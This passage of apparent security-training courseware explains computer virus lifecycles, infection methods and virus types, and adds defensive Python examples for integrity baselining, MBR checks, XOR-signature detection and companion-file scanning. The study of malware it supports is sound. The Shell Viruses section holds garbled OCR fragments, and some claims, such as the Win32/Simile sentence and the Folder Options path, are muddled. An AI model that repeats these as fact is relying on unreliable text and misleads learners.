A computer virus is a self-replicating program that produces its code by attaching copies of itself to other executable code and operates without the knowledge or consent of the user. Like a biological virus, a computer virus is contagious and can contaminate other files; however, viruses can infect external machines only with the assistance of computer users.

Some viruses affect computers as soon as their code is executed; other viruses remain dormant until a pre-determined circumstance is met. Viruses infect a variety of files, such as logical overlay files (.OVL) and executable files (.EXE, .SYS, .COM, or .BAT). They are transmitted through file downloads, infected disk/flash drives, and email attachments.

Characteristics of Viruses

The performance of a computer is affected by a virus infection. This infection can lead to data loss, system crash, and file corruption. Some of the characteristics of a virus are as follows:
- Infects other programs
- Transforms itself
- Encrypts itself
- Alters data
- Corrupts files and programs
- Replicates itself

Purpose of Creating Viruses

Attackers create viruses with disreputable motives. Criminals create viruses to destroy a company's data, as an act of vandalism, or to destroy a company's products; however, in some cases, viruses aid the system. An attacker creates a virus for the following purposes:
- Inflict damage on competitors
- Realize financial benefits
- Vandalize intellectual property
- Play pranks
- Conduct research
- Engage in cyber-terrorism
- Distribute political messages
- Damage the network or computers
- Gain remote access to the victim's computer
Indications of Virus Attack

Indications of virus attacks arise from abnormal activities. Such activities reflect the nature of a virus by interrupting the regular flow of a process or a program. However, not all bugs contribute toward attacking the system; they may merely be false positives. For example, if the system runs slower than usual, one may assume that a virus has infected the system; however, the actual reason might be program overload.

An effective virus tends to multiply rapidly and may infect many machines in a short period. Viruses can infect files on the system, and when such files are transferred, they can infect the machines of other users who receive them. A virus can also use file servers to infect files. When a virus infects a computer, the victim or user will be able to identify some indications of the presence of the virus infection.

Some indications of computer virus infection are as follows:
- Processes require more resources and time, resulting in degraded performance
- Computer beeps with no display and the OS does not load
- Drive label changes
- Constant antivirus alerts
- Computer freezes frequently or encounters an error such as BSOD
- Files and folders are missing
- Suspicious hard drive activity
- Browser window "freezes"
- Lack of storage space
- Unwanted advertisements and pop-up windows
Stages of Virus Lifecycle

The virus lifecycle includes the following six stages from origin to elimination.

1. Design: Development of virus code using programming languages or construction kits.
2. Replication: The virus replicates itself within the target system for a period and then spreads.
3. Launch: The virus is activated when the user performs specific actions such as running an infected program.
4. Detection: The virus is identified as a threat infecting target systems.
5. Incorporation: Antivirus software developers assimilate defenses against the virus.
6. Execution of the damage routine and elimination: The virus delivers its damage routine on the systems it has reached; users install antivirus updates and eliminate the virus threat.

Working of Viruses

Viruses can attack a target host's system using a variety of methods. They can attach themselves to programs and transmit themselves to other programs through specific events. Viruses need such events to take place, as they cannot self-start, infect hardware, or transmit themselves using non-executable files. "Trigger" and "direct attack" events can cause a virus to activate and infect the target system when the user triggers attachments received through email, websites, malicious advertisements, flash cards, pop-ups, and so on. The virus can then attack the system's built-in programs, antivirus software, data files, system startup settings, etc.

Viruses have two phases: the infection phase and the attack phase.

Infection Phase

Programs modified by a virus infection can enable virus functionalities to run on the system. The virus infects the target system after the execution of infected programs, because the program code leads to the virus code, which is triggered and becomes active upon execution.

The two most important factors of the infection phase in a virus are as follows:
- Method of infection
- Method of spreading

A virus infects a system in the following sequence:
- The virus loads itself into memory and checks for an executable on the disk.
- The virus appends malicious code to a legitimate program without the permission or knowledge of the user.
- The user is unaware of the replacement and launches the infected program.
- The execution of the infected program also infects other programs in the system.
- The above cycle continues until the user realizes that there is an anomaly in the system.

Apparently, the user unknowingly triggers and executes the virus for it to function. There are many ways to execute programs while the computer is running. For example, if the user installs any software tool, the setup program calls various built-in sub-programs during extraction. If a virus program already exists, it can be activated with this type of execution, and the virus can also infect additional setup programs.

Specific viruses infect in different ways, such as:
- A file virus infects by attaching itself to an executable system application program. Potential targets for virus infections are as follows:
  * Source code
  * Batch files
  * Script files
- Boot sector viruses execute their code before the target PC's operating system is loaded.

Viruses spread in a variety of ways. There are virus programs that infect and keep spreading every time the user executes them. Some virus programs do not infect programs when first executed. They reside in a computer's memory and infect programs later. Such virus programs wait for a specified trigger event to spread at a later stage. Therefore, it is difficult to recognize which event might trigger the execution of a dormant virus. As illustrated in the figure below, the .EXE file's header, when triggered, executes and starts running the application. Once this file is infected, any trigger event from the file's header can activate the virus code along with the application program immediately after executing it.

The most popular methods by which a virus spreads are as follows:
- Infected files: A virus can infect a variety of files.
- File-sharing services: A virus can take advantage of file servers to infect files. When unsuspecting users open the infected files, their machines also become infected.
- DVDs and other storage media: When infected storage media such as DVDs, flash drives, and portable hard disks are inserted into a clean system, the system gets infected.
- Malicious attachments and downloads: A virus spreads if a malicious attachment sent via email is opened or when apps are downloaded from untrusted sources.
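The infection sequence above (the virus appends itself to a legitimate program and patches the header so that control reaches the virus first) changes the host file's contents and size while leaving its name alone. The following Python example is added here and is not from the page; it shows the defender's side of that sequence. It builds a throw-away directory of constructed "programs", baselines their sizes and SHA-256 hashes, simulates an appending infection and a dropped executable, and reports what changed. The simulated infection only overwrites a marker at the start of the file and appends bytes; it is not a real infector, and the file contents are made up for the demo.

```python
"""Catch a file infector by baselining executables and re-checking them.

An appending file virus glues its code onto a host program and patches the
header so the host jumps to the virus first. The infected file keeps its name
but changes in both content and size, which a hash baseline taken on a clean
system and compared later surfaces directly.
"""
import hashlib
import os
import tempfile

EXEC_EXTS = (".exe", ".com", ".sys", ".bat", ".dll", ".scr")


def baseline(root: str) -> dict:
    """Map each executable under root (relative path) to (size, sha256)."""
    snap = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(EXEC_EXTS):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    data = fh.read()
                snap[os.path.relpath(path, root)] = (len(data), hashlib.sha256(data).hexdigest())
    return snap


def compare(before: dict, after: dict) -> dict:
    """Return {relpath: verdict} for every executable that changed, appeared, or vanished."""
    report = {}
    for rel in before.keys() | after.keys():
        if rel not in after:
            report[rel] = "removed"
        elif rel not in before:
            report[rel] = "new executable"
        elif before[rel] != after[rel]:
            grew = after[rel][0] - before[rel][0]
            report[rel] = f"modified (+{grew} bytes)" if grew > 0 else "modified"
    return report


def simulate_append_infection(path: str, virus_body: bytes, jump_marker: bytes = b"JMP!") -> None:
    """Mimic an appending infector: patch the file's first bytes to 'point at' code glued on the end.

    This is a demo stand-in, not a real infector: it only overwrites a marker and appends bytes.
    """
    with open(path, "rb") as fh:
        host = fh.read()
    infected = jump_marker + host[len(jump_marker):] + virus_body
    with open(path, "wb") as fh:
        fh.write(infected)


def demo() -> dict:
    """Build a clean tree, baseline it, infect one program, drop another, and return the diff."""
    with tempfile.TemporaryDirectory() as root:
        # Constructed "programs": a fake EXE, a text file (ignored), and a COM stub in a subdirectory.
        progs = {"calc.exe": b"MZ" + b"\x90" * 300,
                 "notes.txt": b"harmless text",
                 os.path.join("bin", "tool.com"): b"\xb8\x01\x00\xcd\x21" * 40}
        for rel, content in progs.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(content)
        clean = baseline(root)
        simulate_append_infection(os.path.join(root, "calc.exe"), b"VIRUS" * 64)
        with open(os.path.join(root, "dropped.scr"), "wb") as fh:
            fh.write(b"MZ")
        return compare(clean, baseline(root))


if __name__ == "__main__":
    for rel, verdict in sorted(demo().items()):
        print(f"{rel}: {verdict}")
```

In production the baseline must be stored where the infected host cannot rewrite it (a separate system or a signed store), and the comparison should also account for legitimate updates, which is what file integrity monitoring tools add on top of this core loop.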

Figure 7.34: .EXE file before and after infection (after infection, the file header jumps to the appended virus code, which then runs the original program)

Attack Phase

Once viruses spread throughout the target system, they start corrupting the files and programs of the host system. Some viruses trigger and corrupt the host system only after the triggering event is activated. Some viruses have bugs that replicate themselves and perform activities such as deleting files and increasing session time only after spreading. Viruses corrupt their targets as intended by their developers.

Most viruses that attack target systems perform the following actions:
- Delete files and alter the content of data files, slowing down the system
- Perform tasks not related to applications, such as playing music and creating animations

Figure 7.35: Attack phase (files A and B stored in consecutive pages before the attack; their pages interleaved and fragmented after the virus attack)

The figure shows two files, A and B. Before the attack, the two files are located one after the other in an orderly manner. Once a virus code infects the file, it alters the position of the files placed consecutively, leading to inaccuracy in file allocations and causing the system to slow down as the user tries to retrieve the files.

In the attack phase:
- Some viruses execute upon triggering specific events
- Some viruses execute and corrupt via built-in bug programs after being stored in the host's memory
- The latest and most advanced viruses conceal their presence, attacking only after thoroughly spreading through the host

How does a Computer Get Infected by Viruses?

To infect a system, first, a virus has to enter it. Once the user downloads and installs the virus from any source and in any form, it replicates itself to other programs. Then, the virus can infect the computer in various ways, some of which are listed below:
- Downloads: Attackers incorporate viruses in popular software programs and upload them to websites intended for download. When a user unknowingly downloads this infected software and installs it, the system is infected.
- Email attachments: Attackers usually send virus-infected files as email attachments to spread the virus on the victim's system. When the victim opens the malicious attachment, the virus automatically infects the system.
- Pirated software: Installing cracked versions of software (OS, Adobe, Microsoft Office, etc.) might infect the system, as they may contain viruses.
- Failing to install security software: With the increase in security parameters, attackers are designing new viruses. Failing to install the latest antivirus software or regularly update it may expose the computer system to virus attacks.
- Not updating software: If patches are not regularly installed when released by vendors, viruses might exploit vulnerabilities, thereby allowing an attacker to access the system.
- Browser: By default, every browser comes with built-in security. An incorrectly configured browser could result in the automatic running of scripts, which may, in turn, allow viruses to enter the system.
- Firewall: Disabling the firewall will compromise the security of network traffic and invite viruses to infect the system.
- Pop-ups: When the user clicks any suspicious pop-up by mistake, the virus hidden behind the pop-up enters the system. Whenever the user turns on the system, the installed virus code will run in the background.
- Removable media: When a healthy system is associated with virus-infected removable media (e.g., CD/DVD, USB drive, card reader), the virus spreads to the system.
- Network access: Connecting to an untrusted Wi-Fi network, leaving Bluetooth ON, or permitting a file sharing program that is accessed openly will allow a virus to take over the device.
- Backup and restore: Taking a backup of an infected file and restoring it to a system infects the system again with the same virus.
- Malicious online ads: Attackers post malicious online ads by embedding malicious code in the ads, also known as malvertising. Once users click these ads, their computers get infected.
- Social media: People tend to click on social media sites, including malicious links shared by their contacts, which can infect their systems.


Types of Viruses

Computer viruses are malicious software programs written by attackers to gain unauthorized access to a target system. Thus, they compromise the security of the system as well as its performance. For any virus to corrupt a system, it has to first associate its code with executable code.
It is important to understand how viruses:
= Add themselves to the target host's code
= Choose to act upon the target system
Viruses are categorized according to their functioning and targets. Some of the most common types of computer viruses that adversely affect the security of systems are listed below:
1. System or Boot Sector Virus
2. File Virus
3. Multipartite Virus
4. Macro Virus
5. Cluster Virus
6. Encryption Virus
7. Stealth/Tunneling Virus
8. Sparse Infector Virus
9. Polymorphic Virus
10. Metamorphic Virus
11. Overwriting File or Cavity Virus
12. Companion Virus/Camouflage Virus
13. Shell Virus
14. File Extension Virus
15. FAT Virus
16. Logic Bomb Virus
17. Web Scripting Virus
18. Email Virus
19. Armored Virus
20. Add-on Virus
21. Intrusive Virus
22. Direct Action or Transient Virus
23. Terminate and Stay Resident Virus (TSR)
System or Boot Sector Viruses

The most common targets for a virus are the system sectors, which include the master boot record (MBR) and the DOS boot record system sectors. An OS executes code in these areas while booting. Every disk has some sort of system sector. MBRs are the most virus-prone zones because if the MBR is corrupted, all data will be lost. The DOS boot sector also executes during system booting. This is a crucial point of attack for viruses.
The system sector consists of only 512 bytes of disk space. Therefore, system sector viruses conceal their code in some other disk space. The primary carriers of system or boot sector viruses are email attachments and removable media (USB drives). Such viruses reside in memory. Some sector viruses also spread through infected files; these are known as multipartite viruses.
A boot sector virus moves the MBR to another location on the hard disk and copies itself to the original location of the MBR. When the system boots, first, the virus code executes and then passes control to the original MBR.

Figure 7.36: Working of system and boot sector virus (before infection; after infection)

System sector viruses create the illusion that there is no virus on the system. One way to deal with this virus is to avoid the use of the Windows OS and switch to Linux or Mac, because Windows is more prone to such attacks. Linux and Macintosh have built-in safeguards against these viruses. The other approach for protection is to periodically perform antivirus checks.
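An integrity check on the 512-byte system sector, as an added example that is not code from the courseware or from EC-Council: it parses the standard MBR layout (446 bytes of boot code, four 16-byte partition entries, the 0x55 0xAA signature at offset 510) and compares a SHA-256 of the boot-code region against a baseline recorded while the disk was known clean. A boot sector virus that copies itself into the MBR location changes exactly that region while leaving the partition table intact, which is what the check looks for. The two disk images are constructed inside the block; the partition values are sample data, and the function and constant names are this example's own.

```python
import hashlib
import struct

MBR_SIZE = 512                 # a system sector is exactly 512 bytes
PARTITION_TABLE_OFFSET = 446   # boot code occupies bytes 0..445
SIGNATURE_OFFSET = 510         # bytes 510..511 hold the 0x55 0xAA boot signature
BOOT_SIGNATURE = b"\x55\xAA"


def parse_mbr(sector: bytes) -> dict:
    """Split a 512-byte MBR into boot code, partition entries and a signature check."""
    if len(sector) != MBR_SIZE:
        raise ValueError(f"expected {MBR_SIZE} bytes, got {len(sector)}")
    partitions = []
    for i in range(4):
        start = PARTITION_TABLE_OFFSET + 16 * i
        # entry layout: status(1) CHS start(3) type(1) CHS end(3) LBA start(4) sector count(4)
        status, ptype, lba_start, count = struct.unpack_from("<B3xB3xII", sector, start)
        if ptype != 0:  # type 0 marks an unused slot
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "lba_start": lba_start, "sectors": count})
    return {
        "boot_code": sector[:PARTITION_TABLE_OFFSET],
        "partitions": partitions,
        "signature_ok": sector[SIGNATURE_OFFSET:SIGNATURE_OFFSET + 2] == BOOT_SIGNATURE,
    }


def boot_code_digest(sector: bytes) -> str:
    """SHA-256 of the boot-code region only; the partition table may legitimately change."""
    return hashlib.sha256(parse_mbr(sector)["boot_code"]).hexdigest()


def boot_code_changed(baseline_digest: str, sector: bytes) -> bool:
    """True when the boot code differs from the recorded known-good baseline."""
    return boot_code_digest(sector) != baseline_digest


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Construct a synthetic MBR for the demonstration (not a real disk image)."""
    code = boot_code[:PARTITION_TABLE_OFFSET].ljust(PARTITION_TABLE_OFFSET, b"\x00")
    # one bootable partition of type 0x07 starting at LBA 2048, 409600 sectors long
    entry = struct.pack("<B3sB3sII", 0x80, b"\x01\x01\x00", 0x07, b"\xfe\xff\xff", 2048, 409600)
    table = entry + b"\x00" * (16 * 3)
    return code + table + BOOT_SIGNATURE


CLEAN_MBR = build_sample_mbr(b"\xfa\x33\xc0\x8e\xd0")      # constructed "known-good" boot code
TAMPERED_MBR = build_sample_mbr(b"\xeb\xfe\x90\x90\x90")   # same table, different boot code
BASELINE = boot_code_digest(CLEAN_MBR)


def demo() -> dict:
    """Compare both samples against the baseline taken from the clean one."""
    return {
        "clean_flagged": boot_code_changed(BASELINE, CLEAN_MBR),
        "tampered_flagged": boot_code_changed(BASELINE, TAMPERED_MBR),
        "table_preserved": parse_mbr(CLEAN_MBR)["partitions"] == parse_mbr(TAMPERED_MBR)["partitions"],
    }


if __name__ == "__main__":
    print(demo())
```

On a real machine the sector comes from the raw disk device (on Linux, the first 512 bytes of a device such as /dev/sda, which needs root), read once while the system is trusted and again after booting from known-clean media; a changed boot code with an unchanged partition table is the pattern described above.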
File Viruses

File viruses infect files executed or interpreted in the system, such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files. File viruses can be direct-action (non-resident) or memory-resident.
File viruses insert their code into the original file and infect executable files. Such viruses are numerous, albeit rare. They infect in a variety of ways and are found in numerous file types. The most common type of file virus operates by identifying the file type it can infect most easily, such as that with filenames ending in .COM or .EXE. During program execution, the virus executes along with program files to infect more files. Overwriting a virus is not easy, as the overwritten programs no longer function properly. These viruses tend to be found immediately. Before inserting their code into a program, some file viruses save the original instructions and allow the original program to execute, so that everything appears normal.
File viruses hide their presence using stealth techniques to reside in a computer's memory in the same way as system sector viruses. They do not show any increase in file length while performing directory listing. If a user attempts to read the file, the virus intercepts the request, and the user gets back his original file. File viruses can infect many file types, as a wide variety of infection techniques exist.

Figure 7.37: Working of file virus
Multipartite Viruses

A multipartite virus (also known as a multipart virus or hybrid virus) combines the approach of file infectors and boot record infectors and attempts to simultaneously attack both the boot sector and the executable or program files. When the virus infects the boot sector, it will, in turn, affect the system files and vice versa. This type of virus re-infects a system repeatedly if it is not rooted out entirely from the target machine. Some examples of multipartite viruses include Invader, Flip, and Tequila.

Macro Viruses

Macro viruses infect Microsoft Word or similar applications by automatically performing a sequence of actions after triggering an application. Most macro viruses are written using the macro language Visual Basic for Applications (VBA), and they infect templates or convert infected documents into template files while maintaining their appearance of common document files.
Macro viruses are somewhat less harmful than other viruses. They usually spread via email. Pure data files do not allow the spreading of viruses, but sometimes, the average user, due to the extensive macro languages used in some programs, easily overlooks the line between a data file and an executable file. In most cases, just to make things easy for users, the line between a data file and a program starts to blur only when the default macros are set to run automatically every time the data file is loaded. Virus writers can exploit universal programs with macro capability, such as Microsoft Word, Excel, and other Office programs. Windows Help files can also contain macro code.

Figure 7.38: Working of a macro virus (infects macro-enabled documents)

Cluster Viruses

Cluster viruses infect files without changing the file or planting additional files. They save the virus code to the hard drive and overwrite the pointer in the directory entry, directing the disk read point to the virus code instead of the actual program. Even though the changes in the directory entry may affect all the programs, only one copy of the virus exists on the disk. A cluster virus, e.g., Dir-2, first launches itself when any program starts on the computer system, and control is then passed to the actual program.
This virus infection leads to severe problems if the victim does not know its exact location. If it infects memory, it controls access to the directory structure on the disk. If the victim boots from a clean floppy disk and then runs a utility such as CHKDSK, the utility reports a serious problem with the cross-linked file on the disk. Such utilities usually offer to correct the problem. If the offer is accepted, the virus infects all the executable files and results in the loss of all original content, or all files might appear to be of the same size.

Stealth Viruses/Tunneling Viruses

These viruses try to hide from antivirus programs by actively altering and corrupting the service call interrupts while running. The virus code replaces the requests to perform operations with respect to these service call interrupts. These viruses state false information to hide their presence from antivirus programs. For example, a stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code.
A stealth virus hides from antivirus software by hiding the original size of the file or temporarily placing a copy of itself in some other system drive, thus replacing the infected file with the uninfected file that is stored on the hard drive.
In addition, a stealth virus hides the modifications performed by it. It takes control of the system's functions that read files or system sectors. When another program requests information that has already been modified by the virus, the stealth virus reports that information to the requesting program instead. This virus also resides in memory.
To avoid detection, these viruses always take over system functions and use them to hide their presence.
One of the carriers of stealth viruses is the rootkit. Installing a rootkit results in such a virus attack because a Trojan installs the rootkit and is thus capable of hiding any malware.

Figure 7.39: Working of stealth virus/tunneling virus
Virus Removal
= Always perform a cold boot (boot from write-protected CD or DVD)
= Never use DOS commands such as FDISK to fix the virus
= Use antivirus software

Encryption Viruses
Encryption viruses or cryptolocker viruses penetrate the target system via freeware, shareware, codecs, fake advertisements, torrents, email spam, and so on. This type of virus consists of an encrypted copy of the virus and a decryption module. The decryption module remains constant, whereas the encryption makes use of different keys.
An encryption key consists of a decryption module and an encrypted copy of the code, which enciphers the virus. When the attacker injects the virus into the target machine, the decryptor will first execute and decrypt the virus body. Then, the virus body executes and replicates or becomes resident in the target machine. The replication process is successfully accomplished using the encryptor. Each virus-infected file uses a different key for encryption. These viruses employ XOR on each byte with a randomized key. The decryption technique employed is "x," or XOR on each byte with a randomized key that is generated and saved by the root virus.
Encryption viruses block access to target machines or provide victims with limited access to the system. They use encryption to hide from virus scanners. The virus scanner cannot detect the encryption virus using signatures, but it can detect the decrypting module.
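The layout the paragraphs above describe, as an added demonstration that is not code from the courseware or from EC-Council: a constant decryptor stub, a per-copy key, and a body XORed with that key. The stub, body and keys are constructed sample values, and the function names are this example's own. It shows why a byte signature taken from the plaintext body misses every infected copy while a signature on the unchanging decryptor matches all of them, and that an analyst who can read the stored key from the file recovers the body with the same XOR.

```python
# Constructed sample values for the demonstration; none are taken from real malware.
DECRYPTOR_STUB = b"\xDE\xC0\xDE\xAD"      # stands in for the constant decryption module
PLAINTEXT_BODY = b"SAMPLE-VIRUS-BODY-01"  # stands in for the body a signature would target
SAMPLE_KEYS = [b"\x9A\xC3\xB1\xE4",       # one key per infected copy, as the text describes
               b"\xF0\x81\xD2\xA7",
               b"\xBB\xCE\x99\xFF"]


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR each byte with the repeating key. XOR is its own inverse, so the same
    call both enciphers and deciphers."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_copy(key: bytes) -> bytes:
    """Lay out one infected copy as [constant decryptor][per-copy key][XORed body]."""
    return DECRYPTOR_STUB + key + xor_bytes(PLAINTEXT_BODY, key)


def recover_body(copy: bytes, key_len: int) -> bytes:
    """What the decryptor does at run time, and what an analyst can repeat offline:
    read the stored key and undo the XOR."""
    stub_len = len(DECRYPTOR_STUB)
    key = copy[stub_len:stub_len + key_len]
    return xor_bytes(copy[stub_len + key_len:], key)


def signature_hits(copies, signature: bytes) -> int:
    """Count copies in which a byte-pattern signature appears verbatim."""
    return sum(1 for c in copies if signature in c)


def demo() -> dict:
    copies = [build_copy(k) for k in SAMPLE_KEYS]
    key_len = len(SAMPLE_KEYS[0])
    return {
        "copies": len(copies),
        # the body differs in every copy, so its plaintext signature never matches
        "body_signature_hits": signature_hits(copies, PLAINTEXT_BODY),
        # the decryptor is identical in every copy, so its signature matches all of them
        "stub_signature_hits": signature_hits(copies, DECRYPTOR_STUB),
        "distinct_encrypted_bodies": len({c[len(DECRYPTOR_STUB) + key_len:] for c in copies}),
        "all_bodies_recoverable": all(recover_body(c, key_len) == PLAINTEXT_BODY for c in copies),
    }


if __name__ == "__main__":
    print(demo())
```

The sample keys deliberately use only bytes of 0x80 and above so that no key or stub byte can coincide with the ASCII body; with real samples, the constant decryptor is still the part worth writing a signature for, exactly as the text concludes.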

Figure 7.40: Working of encryption virus (the same virus code enciphered with key 1, key 2, and key 3 yields encryption virus 1, 2, and 3)
Sparse Infector Viruses

To spread infection, viruses typically attempt to hide from antivirus programs. Sparse infector viruses infect less often and try to minimize their probability of discovery. These viruses infect only occasionally upon satisfying certain conditions or infect only those files whose lengths fall within a narrow range.
The sparse infector virus works with two approaches:
= Replicates only occasionally (e.g., every tenth program executed or on a particular day of the week)
= Determines which file to infect based on certain conditions (e.g., infects target files with a maximum size of 128 kb)
The diagram below shows the working of a sparse infector virus. The attacker sends a sparse infector virus to the target machine and sets a wakeup call for the virus to execute on the 15th day of every month. This strategy makes it difficult for the antivirus program to detect the virus, thus allowing the virus to infect the target machine successfully.

Figure 7.41: Working of sparse infector virus (wake up on the 15th of every month and execute code)
Polymorphic Viruses

Such viruses infect a file with an encrypted copy of a polymorphic code already decoded by a decryption module. Polymorphic viruses modify their code for each replication to avoid detection. They accomplish this by changing the encryption module and the instruction sequence. Polymorphic mechanisms use random number generators in their implementation.
The general use of the mutation engine is to enable polymorphic code. The mutator provides a sequence of instructions that a virus scanner can use to optimize an appropriate detection algorithm. Slow polymorphic code prevents antivirus professionals from accessing the code. A simple integrity checker detects the presence of a polymorphic virus in the system's disk.
A polymorphic virus consists of three components: the encrypted virus code, the decryptor routine, and the mutation engine. The function of the decryptor routine is to decrypt the virus code. It decrypts the code only after taking control of the computer. The mutation engine generates randomized decryption routines. Such decryption routines vary whenever the virus infects a new program.
The polymorphic virus encrypts both the mutation engine and the virus code. When the user executes a polymorphic-virus-infected program, the decryptor routine takes complete control of the system, after which it decrypts the virus code and the mutation engine. Next, the decryption routine transfers the system control to the virus, which locates a new program to infect. In the Random Access Memory (RAM), the virus makes a replica of itself as well as the mutation engine. Then, the virus instructs the encrypted mutation engine to generate a new randomized decryption routine, which can decrypt the virus. Here, the virus encrypts the new copies of both the virus code and the mutation engine. Thus, this virus, along with the newly encrypted virus code and encrypted mutation engine (EME), appends the new decryption routine to a new program, thereby continuing the process.
Polymorphic viruses running on target systems are difficult to detect due to the encryption of the virus body and the changes in the decryption routine each time these viruses infect. It is difficult for virus scanners to identify these viruses, as no two infections look alike.

Figure: Polymorphic virus
Metamorphic Viruses

Metamorphic viruses are programmed such that they rewrite themselves completely each time they infect a new executable file. Such viruses are sophisticated and use metamorphic engines for their execution.
Metamorphic code reprograms itself. It is translated into temporary code (a new variant of the same virus but with different code) and then converted back into the original code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. Metamorphic viruses are more effective than polymorphic viruses.
The transformation of virus bodies ranges from simple to complex, depending on the technique used. Some techniques used for metamorphosing viruses are as follows:
= Disassembler
= Expander
= Permutator
= Assembler
Virus bodies are transformed in the following steps:
1. Inserts dead code
2. Reshapes expressions
3. Reorders instructions
4. Modifies variable names
5. Encrypts program code
6. Modifies program control structure

Figure 7.43: Working of metamorphic virus (the diagram depicts metamorphic malware and its metamorphic variants)

Commonly known metamorphic viruses are as follows:
= Win32/Simile
The intruder programs this virus in assembly language to target Microsoft Windows. This process is complicated and generates almost 90% of the virus code.
= Zmist
Zmist is also known as Zombie.Mistfall. It was the first virus to use the technique called "code integration." This code inserts itself into other code, regenerates the code, and rebuilds the executable.
Overwriting File or Cavity Viruses

Some programs have empty spaces in them. Cavity viruses, also known as space fillers, overwrite a part of the host file with a constant (usually nulls), without increasing the length of the file while preserving its functionality. Maintaining a constant file size when infecting allows the virus to avoid detection. Cavity viruses are rarely found due to the unavailability of hosts and code complexity.
A new design of a Windows file, called the Portable Executable (PE), improves the loading speed of programs. However, it leaves a particular gap in the file while it is being executed, which can be used by the cavity virus to insert itself. The most popular virus family in this category is the CIH virus (known as Chernobyl or Spacefiller).

Figure 7.44: Working of overwriting file or cavity virus (content in the file before infection; content in the file after infection)

Companion/Camouflage Viruses

The companion virus stores itself with the same filename as the target program file. The virus infects the computer upon executing the file, and it modifies the hard disk data. Companion viruses use DOS to run COM files before the execution of EXE files. The virus installs an identical COM file and infects EXE files.
This is what happens. Suppose that a companion virus is executing on the PC and decides that it is time to infect a file. It looks around and happens to find a file called notepad.exe. It now creates a file called notepad.com, containing the virus. The virus usually plants this file in the same directory as the .exe file; however, it can also place it in any directory on the DOS path. If you type notepad and press Enter, DOS executes notepad.com instead of notepad.exe (in sequence, DOS will execute COM, then EXE, and then BAT files with the same root name, if they are all in the same directory). The virus executes, possibly infecting more files, and then loads and executes notepad.exe. The user would probably fail to notice that something is wrong. It is easy to detect a companion virus just by the presence of the extra COM file in the system.
Figure 7.45: Working of companion virus/camouflage virus (the virus infects the system with a file notepad.com and saves it alongside Notepad.exe)

Shell Viruses

The shell virus code forms a shell around the target host program's code, making itself the original program with the host code as its sub-routine. Nearly all boot program viruses are shell viruses.

Before Infection
. Hat
<— Oiignal
regen —>
|
After Infection

Ca
FileExtensionViruses
Vin Coe
—
> a <— orgieal
Progen—>

File extension viruses change the extensions of files. The extension .TXT is safe as it indicates a pure text file. With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you will only see BAD.TXT. If you have forgotten that extensions are turned off, you might think that this is a text file and open it. It actually is an executable Visual Basic Script virus file and could cause severe damage.
The guidelines to secure files against such virus infection are as follows:
= Turn off "Hide file extensions" in Windows (Go to Control Panel -> Appearance and Personalization -> Show hidden files and folders -> View tab -> Uncheck Hide extensions for known file types).
= Scan all the files in the system using robust antivirus software; this requires a substantial amount of time.
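Two of the artifacts described in the Companion/Camouflage Viruses and File Extension Viruses sections can be checked for with a simple directory listing scan. The block below is an added example, not code from the courseware or from EC-Council: it flags a .com file that shares its root name with a .exe (the extra COM file the companion section says is easy to spot) and names like BAD.TXT.VBS whose visible extension hides an executable one. The extension sets and the sample listing are this example's own assumptions and constructed data.

```python
import os
from pathlib import Path

# Final extensions that Windows/DOS will execute; the set is an assumption for this example.
EXECUTABLE_EXTS = {".com", ".exe", ".bat", ".cmd", ".vbs", ".js", ".scr", ".pif"}
# Harmless-looking extensions a double-extension name shows as its visible part.
DOCUMENT_EXTS = {".txt", ".doc", ".docx", ".pdf", ".jpg", ".png", ".xls"}


def find_companion_files(names):
    """Return .com names that share a root name with a .exe in the same listing,
    the tell-tale extra COM file the companion virus section describes."""
    by_root = {}
    for name in names:
        root, ext = os.path.splitext(name)
        by_root.setdefault(root.lower(), set()).add(ext.lower())
    return sorted(root + ".com" for root, exts in by_root.items()
                  if ".exe" in exts and ".com" in exts)


def find_double_extensions(names):
    """Return names such as BAD.TXT.VBS: a document-style extension immediately
    before an executable one, which Windows hides when 'Hide extensions' is on."""
    hits = []
    for name in names:
        parts = name.lower().split(".")
        if (len(parts) >= 3
                and "." + parts[-1] in EXECUTABLE_EXTS
                and "." + parts[-2] in DOCUMENT_EXTS):
            hits.append(name)
    return hits


def scan_names(names) -> dict:
    """Run both checks over a list of file names."""
    return {"companion_files": find_companion_files(names),
            "double_extensions": find_double_extensions(names)}


def scan_directory(path) -> dict:
    """Run both checks over the files directly inside a real directory."""
    names = [p.name for p in Path(path).iterdir() if p.is_file()]
    return scan_names(names)


# Constructed directory listing, as the notepad.exe example above would leave it.
SAMPLE_LISTING = ["notepad.exe", "notepad.com", "calc.exe", "readme.txt",
                  "BAD.TXT.VBS", "report.pdf", "holiday.jpg.scr", "setup.exe"]

if __name__ == "__main__":
    print(scan_names(SAMPLE_LISTING))
```

A legitimate program can ship both a .com and a .exe, so a companion hit is a lead to verify against the vendor's file list rather than a verdict; a double extension ending in a script or screensaver extension, by contrast, has no ordinary reason to exist in a user's documents folder.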

Figure 7.47: Screenshot displaying Folder Options window

FAT Viruses

A FAT virus is a computer virus that attacks the File Allocation Table (FAT), a system used in Microsoft products and some other types of computer systems to access the information stored on a computer. By attacking the FAT, a virus can cause severe damage to a computer. FAT viruses can work in a variety of ways. Some are designed to embed themselves into files so that when the FAT accesses the file, the virus is triggered. Others may attack the FAT directly. Many are designed to overwrite files or directories, and material on a computer can be lost permanently. If a FAT virus is sufficiently powerful, it can render a computer unusable in addition to destroying data, forcing a user to reformat the computer.
Essentially, a FAT virus destroys the index, thereby making it impossible for a computer to locate files. The virus can spread to files when the FAT attempts to access them, corrupting the entire computer eventually. FAT viruses often manifest in the form of corrupted files, with users noting that files are missing or inaccessible. The FAT architecture itself can also be changed; e.g., a computer that should be using the FAT32 protocol might abruptly say that it is using FAT12.

Logic Bomb Viruses

